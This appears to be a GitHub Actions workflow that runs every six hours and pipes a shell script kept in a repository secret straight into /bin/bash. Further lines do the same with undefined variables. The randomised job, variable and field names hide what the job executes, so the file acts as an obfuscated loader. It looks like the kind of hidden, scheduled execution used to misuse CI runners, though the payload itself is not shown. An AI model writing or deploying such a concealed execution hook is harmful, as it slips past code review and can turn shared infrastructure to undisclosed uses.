name: henianchensheng
on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: henianchensheng
        env:
          ayhpo091: ${{ secrets.ayhpo091 }}
        run: |
          echo $ayhpo091 | jq -r .y8 | /bin/bash
          echo $obgnl31 | jq -r .ik5088 | /bin/bash
          echo $rsdy1186 | jq -r .ef4 | /bin/bash
          echo $ixt46485 | jq -r .a4 | /bin/bash
          echo $iec4874 | jq -r .fcswy5 | /bin/bash
          echo $bhca99220 | jq -r .kihd042 | /bin/bash
          echo $arxhr85 | jq -r .saa4608 | /bin/bash
          echo $de885 | jq -r .nln9200 | /bin/bash
          echo $yukb823 | jq -r .d47207 | /bin/bash

